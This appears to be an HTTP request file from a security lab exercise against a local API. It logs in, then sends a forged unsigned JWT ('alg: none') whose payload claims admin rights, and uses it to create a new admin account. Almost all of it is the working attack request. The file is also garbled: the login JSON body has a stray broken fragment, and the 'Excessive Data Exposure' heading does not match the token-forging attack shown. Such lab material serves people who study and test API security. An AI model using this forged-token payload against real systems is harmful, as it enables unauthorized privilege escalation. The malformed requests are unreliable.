# ================ 3 =========================
## === Skenario 3A - Excessive Data Exposure ===
### 1. LOGIN
POST http://localhost:3000/login
Content-Type: application/json

{
    "username" : "bob",
    "password" : "password"
}" : "alice"
}

### 2. Menambah User dengan token NONE tanpa signature dan FORGED token role dari user biasa menjadi admin
POST http://localhost:3000/api/users
Authorization: Bearer eyJhbGciOiJub25lIiwgInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiIyIiwibmFtZSI6ImFsaWNlIiwiZW1haWwiOiJhbGljZUBleGFtcGxlLmNvbSIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTY4NzQwMTU3NCwiaXNzIjoidXJuOmp3dCJ9.
Content-Type: application/json

{
    "username" : "hackings",
    "email" : "email@hacking.com",
    "password" : "hacking",
    "role" : "admin"
}



